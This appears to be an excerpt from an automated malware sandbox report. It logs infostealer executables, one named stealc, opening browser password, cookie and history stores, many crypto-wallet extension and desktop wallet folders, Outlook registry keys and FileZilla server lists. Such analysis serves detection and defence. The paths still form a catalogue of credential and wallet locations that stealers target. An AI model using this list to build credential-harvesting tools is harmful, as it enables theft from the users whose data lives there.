                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-walJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shmJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-walJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\DUKNXICOZT
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCAN
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCAN
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\VWDFPKGDUF
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLA
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\WHZAGPPPLA
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQC
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\ERWQDBYZVW
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\GLTYDMDUST
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCAN
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZG
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCAN
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQC
